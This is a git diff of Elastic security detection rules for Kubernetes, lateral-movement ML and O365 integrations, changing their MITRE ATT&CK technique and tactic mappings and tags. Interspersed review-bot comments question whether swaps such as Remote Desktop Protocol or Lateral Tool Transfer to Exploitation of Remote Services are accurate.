@@ -99,24 +99,24 @@ not kubernetes.audit.requestObject.spec.containers.image: ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1610" -name = "Deploy Container" -reference = "https://attack.mitre.org/techniques/T1610/" +id = "T1611" +name = "Escape to Host" +reference = "https://attack.mitre.org/techniques/T1611/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1611" -name = "Escape to Host" -reference = "https://attack.mitre.org/techniques/T1611/" +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/kubernetes/privilege_escalation_pod_created_with_sensitive_hostpath_volume.toml b/rules/integrations/kubernetes/privilege_escalation_pod_created_with_sensitive_hostpath_volume.toml index 253479e9a3c..ec7c7a3285f 100644 --- a/rules/integrations/kubernetes/privilege_escalation_pod_created_with_sensitive_hostpath_volume.toml +++ b/rules/integrations/kubernetes/privilege_escalation_pod_created_with_sensitive_hostpath_volume.toml @@ -2,7 +2,7 @@ creation_date = "2022/07/11" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/02" [rule] author = ["Elastic"] 
@@ -107,24 +107,24 @@ not kubernetes.audit.requestObject.spec.containers.image: ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1610" -name = "Deploy Container" -reference = "https://attack.mitre.org/techniques/T1610/" +id = "T1611" +name = "Escape to Host" +reference = "https://attack.mitre.org/techniques/T1611/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1611" -name = "Escape to Host" -reference = "https://attack.mitre.org/techniques/T1611/" +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/kubernetes/privilege_escalation_privileged_pod_created.toml b/rules/integrations/kubernetes/privilege_escalation_privileged_pod_created.toml index 0ad2e174afe..f68d1d287ff 100644 --- a/rules/integrations/kubernetes/privilege_escalation_privileged_pod_created.toml +++ b/rules/integrations/kubernetes/privilege_escalation_privileged_pod_created.toml @@ -2,7 +2,7 @@ creation_date = "2022/07/05" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/02" [rule] author = ["Elastic"] 
@@ -99,24 +99,24 @@ not kubernetes.audit.requestObject.spec.containers.image: ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1610" -name = "Deploy Container" -reference = "https://attack.mitre.org/techniques/T1610/" +id = "T1611" +name = "Escape to Host" +reference = "https://attack.mitre.org/techniques/T1611/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1611" -name = "Escape to Host" -reference = "https://attack.mitre.org/techniques/T1611/" +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/kubernetes/privilege_escalation_sensitive_rbac_change_followed_by_workload_modification.toml b/rules/integrations/kubernetes/privilege_escalation_sensitive_rbac_change_followed_by_workload_modification.toml index 157115d18dd..550d4cdd47e 100644 --- a/rules/integrations/kubernetes/privilege_escalation_sensitive_rbac_change_followed_by_workload_modification.toml +++ b/rules/integrations/kubernetes/privilege_escalation_sensitive_rbac_change_followed_by_workload_modification.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/04" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] 
@@ -54,7 +54,14 @@ references = [ risk_score = 47 rule_id = "3c82bf84-5941-495b-ac41-0302f28e1a90" severity = "medium" -tags = ["Tactic: Execution", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Kubernetes", "Domain: Kubernetes", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Data Source: Kubernetes", + "Domain: Kubernetes", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Persistence", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -75,19 +82,6 @@ sequence by user.name with maxspan=5m [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1610" -name = "Deploy Container" -reference = "https://attack.mitre.org/techniques/T1610/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" @@ -99,9 +93,9 @@ name = "Additional Container Cluster Roles" reference = "https://attack.mitre.org/techniques/T1098/006/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -117,6 +111,6 @@ name = "Additional Container Cluster Roles" reference = "https://attack.mitre.org/techniques/T1098/006/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" 
diff --git a/rules/integrations/kubernetes/privilege_escalation_sensitive_workload_modification_by_user_agent.toml b/rules/integrations/kubernetes/privilege_escalation_sensitive_workload_modification_by_user_agent.toml index c4900f37adf..cd55cbf8734 100644 --- a/rules/integrations/kubernetes/privilege_escalation_sensitive_workload_modification_by_user_agent.toml +++ b/rules/integrations/kubernetes/privilege_escalation_sensitive_workload_modification_by_user_agent.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/05" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/05" [rule] author = ["Elastic"] @@ -53,7 +53,14 @@ references = [ risk_score = 21 rule_id = "78c6559d-47a7-4f30-91fe-7e2e983206c2" severity = "low" -tags = ["Tactic: Execution", "Data Source: Kubernetes", "Domain: Kubernetes", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Data Source: Kubernetes", + "Domain: Kubernetes", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Persistence", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' 
@@ -68,24 +75,38 @@ not kubernetes.audit.user.groups:"system:masters" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1053" -name = "Scheduled Task/Job" -reference = "https://attack.mitre.org/techniques/T1053/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [[rule.threat.technique.subtechnique]] -id = "T1053.007" -name = "Container Orchestration Job" -reference = "https://attack.mitre.org/techniques/T1053/007/" +id = "T1098.006" +name = "Additional Container Cluster Roles" +reference = "https://attack.mitre.org/techniques/T1098/006/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1610" -name = "Deploy Container" -reference = "https://attack.mitre.org/techniques/T1610/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.006" +name = "Additional Container Cluster Roles" +reference = "https://attack.mitre.org/techniques/T1098/006/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.new_terms] field = "new_terms_fields" value = ["user_agent.original", "source.ip", "kubernetes.audit.user.username"] diff --git a/rules/integrations/kubernetes/privilege_escalation_service_account_rbac_write_operation.toml b/rules/integrations/kubernetes/privilege_escalation_service_account_rbac_write_operation.toml index 747bfb801fd..0314f867e2f 100644 --- a/rules/integrations/kubernetes/privilege_escalation_service_account_rbac_write_operation.toml +++ b/rules/integrations/kubernetes/privilege_escalation_service_account_rbac_write_operation.toml 
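Review bot: The two new `[[rule.threat]]` entries map this rule to T1098.006 "Additional Container Cluster Roles" (under TA0004 and TA0003), but that sub-technique covers granting RBAC roles and bindings, whereas the file name and the `[rule.new_terms]` context (`user_agent.original`, `source.ip`, `kubernetes.audit.user.username`) describe anomalous workload modification; the query itself sits outside this hunk, so confirm which verbs and resources it actually matches. If it matches pod/deployment/cronjob writes rather than role or rolebinding writes, the removed T1610 "Deploy Container" / T1053.007 mapping was the accurate one and should be restored under its own tactic instead of reusing T1098.006. Whichever mapping is kept, the `Tactic:` tags in the preceding hunk must list exactly the tactics that remain under `rule.threat`.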
@@ -2,7 +2,7 @@ creation_date = "2026/02/04" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -89,9 +89,9 @@ name = "Additional Container Cluster Roles" reference = "https://attack.mitre.org/techniques/T1098/006/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -107,6 +107,6 @@ name = "Additional Container Cluster Roles" reference = "https://attack.mitre.org/techniques/T1098/006/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/kubernetes/privilege_escalation_suspicious_assignment_of_controller_service_account.toml b/rules/integrations/kubernetes/privilege_escalation_suspicious_assignment_of_controller_service_account.toml index c482f279901..6c59087b0b3 100644 --- a/rules/integrations/kubernetes/privilege_escalation_suspicious_assignment_of_controller_service_account.toml +++ b/rules/integrations/kubernetes/privilege_escalation_suspicious_assignment_of_controller_service_account.toml @@ -2,7 +2,7 @@ creation_date = "2022/09/13" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/02" [rule] author = ["Elastic"] 
@@ -93,24 +93,16 @@ not kubernetes.audit.requestObject.spec.containers.image:( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1610" -name = "Deploy Container" -reference = "https://attack.mitre.org/techniques/T1610/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.001" +name = "Default Accounts" +reference = "https://attack.mitre.org/techniques/T1078/001/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" diff --git a/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_process_args.toml b/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_process_args.toml index 8993db07aa2..a2e6b2e13ee 100644 --- a/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_process_args.toml +++ b/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_process_args.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/11" [rule] anomaly_threshold = 70 @@ -51,7 +51,13 @@ The Lateral Movement Detection integration detects lateral movement activity by - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**. """ severity = "low" -tags = ["Use Case: Lateral Movement Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Execution", "Tactic: Lateral Movement", "Resources: Investigation Guide"] +tags = [ + "Use Case: Lateral Movement Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Lateral Movement", + "Resources: Investigation Guide", +] type = "machine_learning" note = """## Triage and analysis 
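Review bot: The controller-service-account hunk drops the TA0002 "Execution" threat entry, but this file's `tags` line is outside the hunk, so check that its `"Tactic: Execution"` tag is removed in the same commit or the tags will advertise a tactic the rule no longer maps. Adding `T1078.001` "Default Accounts" under T1078 is a reasonable fit for a workload assuming a built-in controller service account; consider keeping the blank line between the subtechnique table and `[rule.threat.tactic]` consistent with the other rule files.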
@@ -89,31 +95,14 @@ Remote Desktop Protocol (RDP) facilitates remote access to systems, often target - Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems have been compromised.""" [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" +id = "T1210" +name = "Exploitation of Remote Services" +reference = "https://attack.mitre.org/techniques/T1210/" -[[rule.threat.technique.subtechnique]] -id = "T1021.001" -name = "Remote Desktop Protocol" -reference = "https://attack.mitre.org/techniques/T1021/001/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_session_duration.toml b/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_session_duration.toml index 9b7810b788f..db8f0b280e8 100644 --- a/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_session_duration.toml +++ b/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_session_duration.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/11" [rule] anomaly_threshold = 70 
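Review bot: The threat hunk replaces T1021.001 "Remote Desktop Protocol" with T1210 "Exploitation of Remote Services", but T1210 describes exploiting a vulnerability in a remote service, while the note text in this same hunk ("Remote Desktop Protocol (RDP) facilitates remote access…") and the rule name describe anomalous use of RDP, which is exactly T1021.001. The same substitution is applied to every lmd RDP rule further down this page (session duration and variance, unusual time, connection spikes, RDP process spike), so the coverage view will claim exploitation detections the ML jobs do not provide. Keep `id = "T1021"` / `name = "Remote Services"` with the `T1021.001` subtechnique under TA0008, and if T1210 is wanted, add it as a second technique rather than a replacement. The hunk also appends a trailing `+` blank line at end of file; drop it to keep the rule files uniform.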
@@ -96,18 +96,14 @@ Remote Desktop Protocol (RDP) enables remote access to systems, facilitating adm - Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to ensure comprehensive remediation.""" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" +id = "T1210" +name = "Exploitation of Remote Services" +reference = "https://attack.mitre.org/techniques/T1210/" -[[rule.threat.technique.subtechnique]] -id = "T1021.001" -name = "Remote Desktop Protocol" -reference = "https://attack.mitre.org/techniques/T1021/001/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/integrations/lmd/lateral_movement_ml_high_remote_file_size.toml b/rules/integrations/lmd/lateral_movement_ml_high_remote_file_size.toml index 2a44e9de8ee..b4d4e4a8ff6 100644 --- a/rules/integrations/lmd/lateral_movement_ml_high_remote_file_size.toml +++ b/rules/integrations/lmd/lateral_movement_ml_high_remote_file_size.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/11" [rule] anomaly_threshold = 70 
@@ -96,13 +96,14 @@ Machine learning models in security environments analyze file transfer patterns - Enhance monitoring and logging for unusual file transfer activities and remote access attempts to improve early detection of similar threats in the future.""" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1570" -name = "Lateral Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1570/" +id = "T1210" +name = "Exploitation of Remote Services" +reference = "https://attack.mitre.org/techniques/T1210/" + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/integrations/lmd/lateral_movement_ml_high_variance_rdp_session_duration.toml b/rules/integrations/lmd/lateral_movement_ml_high_variance_rdp_session_duration.toml index cb00727c844..bc0292876e8 100644 --- a/rules/integrations/lmd/lateral_movement_ml_high_variance_rdp_session_duration.toml +++ b/rules/integrations/lmd/lateral_movement_ml_high_variance_rdp_session_duration.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/11" [rule] anomaly_threshold = 70 
@@ -96,18 +96,14 @@ Remote Desktop Protocol (RDP) enables remote access to systems, facilitating leg - Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected.""" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" +id = "T1210" +name = "Exploitation of Remote Services" +reference = "https://attack.mitre.org/techniques/T1210/" -[[rule.threat.technique.subtechnique]] -id = "T1021.001" -name = "Remote Desktop Protocol" -reference = "https://attack.mitre.org/techniques/T1021/001/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/integrations/lmd/lateral_movement_ml_rare_remote_file_directory.toml b/rules/integrations/lmd/lateral_movement_ml_rare_remote_file_directory.toml index 2fba6b44191..04f5ad44500 100644 --- a/rules/integrations/lmd/lateral_movement_ml_rare_remote_file_directory.toml +++ b/rules/integrations/lmd/lateral_movement_ml_rare_remote_file_directory.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/11" [rule] anomaly_threshold = 70 
@@ -96,13 +96,14 @@ The 'Unusual Remote File Directory' detection leverages machine learning to iden - Update detection mechanisms and rules to enhance monitoring of less common directories and improve the detection of similar threats in the future.""" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1570" -name = "Lateral Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1570/" +id = "T1210" +name = "Exploitation of Remote Services" +reference = "https://attack.mitre.org/techniques/T1210/" + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/integrations/lmd/lateral_movement_ml_rare_remote_file_extension.toml b/rules/integrations/lmd/lateral_movement_ml_rare_remote_file_extension.toml index 3f4e83cc4ef..8cc42195af1 100644 --- a/rules/integrations/lmd/lateral_movement_ml_rare_remote_file_extension.toml +++ b/rules/integrations/lmd/lateral_movement_ml_rare_remote_file_extension.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/11" [rule] anomaly_threshold = 70 @@ -95,13 +95,14 @@ The detection of unusual remote file extensions leverages machine learning to id - Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected.""" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1570" -name = "Lateral Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1570/" +id = "T1210" +name = "Exploitation of Remote Services" +reference = "https://attack.mitre.org/techniques/T1210/" + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + 
diff --git a/rules/integrations/lmd/lateral_movement_ml_spike_in_connections_from_a_source_ip.toml b/rules/integrations/lmd/lateral_movement_ml_spike_in_connections_from_a_source_ip.toml index cf9b04d1252..027b7598adf 100644 --- a/rules/integrations/lmd/lateral_movement_ml_spike_in_connections_from_a_source_ip.toml +++ b/rules/integrations/lmd/lateral_movement_ml_spike_in_connections_from_a_source_ip.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/11" [rule] anomaly_threshold = 70 @@ -96,18 +96,14 @@ Remote Desktop Protocol (RDP) is a common tool for remote management, but advers - Update and enhance monitoring rules to detect similar patterns of unusual RDP connection spikes, ensuring early detection of future attempts.""" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" +id = "T1210" +name = "Exploitation of Remote Services" +reference = "https://attack.mitre.org/techniques/T1210/" -[[rule.threat.technique.subtechnique]] -id = "T1021.001" -name = "Remote Desktop Protocol" -reference = "https://attack.mitre.org/techniques/T1021/001/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/integrations/lmd/lateral_movement_ml_spike_in_connections_to_a_destination_ip.toml b/rules/integrations/lmd/lateral_movement_ml_spike_in_connections_to_a_destination_ip.toml index 1534efbce1e..e511ab60262 100644 --- a/rules/integrations/lmd/lateral_movement_ml_spike_in_connections_to_a_destination_ip.toml +++ b/rules/integrations/lmd/lateral_movement_ml_spike_in_connections_to_a_destination_ip.toml 
@@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/11" [rule] anomaly_threshold = 70 @@ -95,18 +95,14 @@ Remote Desktop Protocol (RDP) is crucial for remote management and troubleshooti - Update and enhance monitoring rules to detect similar patterns of unusual RDP connection spikes in the future, ensuring quick identification and response to potential threats.""" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" +id = "T1210" +name = "Exploitation of Remote Services" +reference = "https://attack.mitre.org/techniques/T1210/" -[[rule.threat.technique.subtechnique]] -id = "T1021.001" -name = "Remote Desktop Protocol" -reference = "https://attack.mitre.org/techniques/T1021/001/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/integrations/lmd/lateral_movement_ml_spike_in_rdp_processes.toml b/rules/integrations/lmd/lateral_movement_ml_spike_in_rdp_processes.toml index 39d87498cf6..d5bcf1bf496 100644 --- a/rules/integrations/lmd/lateral_movement_ml_spike_in_rdp_processes.toml +++ b/rules/integrations/lmd/lateral_movement_ml_spike_in_rdp_processes.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/11" [rule] anomaly_threshold = 70 
@@ -94,18 +94,14 @@ Remote Desktop Protocol (RDP) allows users to connect to other computers over a - Enhance monitoring and detection capabilities for RDP sessions by implementing stricter access controls and logging to detect similar anomalies in the future.""" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" +id = "T1210" +name = "Exploitation of Remote Services" +reference = "https://attack.mitre.org/techniques/T1210/" -[[rule.threat.technique.subtechnique]] -id = "T1021.001" -name = "Remote Desktop Protocol" -reference = "https://attack.mitre.org/techniques/T1021/001/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/integrations/lmd/lateral_movement_ml_spike_in_remote_file_transfers.toml b/rules/integrations/lmd/lateral_movement_ml_spike_in_remote_file_transfers.toml index 009b8ed2300..d66e8ddd4dc 100644 --- a/rules/integrations/lmd/lateral_movement_ml_spike_in_remote_file_transfers.toml +++ b/rules/integrations/lmd/lateral_movement_ml_spike_in_remote_file_transfers.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/11" [rule] anomaly_threshold = 70 
@@ -52,7 +52,13 @@ The Lateral Movement Detection integration detects lateral movement activity by - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**. """ severity = "low" -tags = ["Use Case: Lateral Movement Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Exfiltration", "Tactic: Lateral Movement", "Resources: Investigation Guide"] +tags = [ + "Use Case: Lateral Movement Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Lateral Movement", + "Resources: Investigation Guide", +] type = "machine_learning" note = """## Triage and analysis @@ -91,26 +97,14 @@ Remote file transfer technologies facilitate data sharing across networks, essen - Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to ensure comprehensive remediation efforts are undertaken.""" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1048" -name = "Exfiltration Over Alternative Protocol" -reference = "https://attack.mitre.org/techniques/T1048/" +id = "T1210" +name = "Exploitation of Remote Services" +reference = "https://attack.mitre.org/techniques/T1210/" -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1570" -name = "Lateral Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1570/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/integrations/lmd/lateral_movement_ml_unusual_time_for_an_rdp_session.toml b/rules/integrations/lmd/lateral_movement_ml_unusual_time_for_an_rdp_session.toml index f6ba1598c0b..be5de02f9db 100644 --- a/rules/integrations/lmd/lateral_movement_ml_unusual_time_for_an_rdp_session.toml 
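Review bot: Mapping a spike in remote file transfers to T1210 "Exploitation of Remote Services" misstates the observed behavior; the removed T1570 "Lateral Tool Transfer" (copying files between systems during lateral movement) is what this ML job sees, as the hunk's own note ("Remote file transfer technologies facilitate data sharing across networks…") indicates. The same T1570→T1210 swap is applied to the remote-file-size, rare-directory and rare-extension rules earlier on this page. Removing the TA0010/T1048 entry together with the `"Tactic: Exfiltration"` tag is at least internally consistent, but restore `id = "T1570"` / `name = "Lateral Tool Transfer"` under TA0008 rather than T1210.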
+++ b/rules/integrations/lmd/lateral_movement_ml_unusual_time_for_an_rdp_session.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/11" [rule] anomaly_threshold = 70 @@ -96,18 +96,14 @@ Remote Desktop Protocol (RDP) enables remote access to systems, crucial for IT m - Implement enhanced monitoring on the affected system and related network segments to detect any further suspicious activities or attempts at unauthorized access.""" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" +id = "T1210" +name = "Exploitation of Remote Services" +reference = "https://attack.mitre.org/techniques/T1210/" -[[rule.threat.technique.subtechnique]] -id = "T1021.001" -name = "Remote Desktop Protocol" -reference = "https://attack.mitre.org/techniques/T1021/001/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/integrations/o365/collection_onedrive_excessive_file_downloads.toml b/rules/integrations/o365/collection_onedrive_excessive_file_downloads.toml index ba63cde5f17..e79eaca74da 100644 --- a/rules/integrations/o365/collection_onedrive_excessive_file_downloads.toml +++ b/rules/integrations/o365/collection_onedrive_excessive_file_downloads.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/19" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/24" [rule] author = ["Elastic"] 
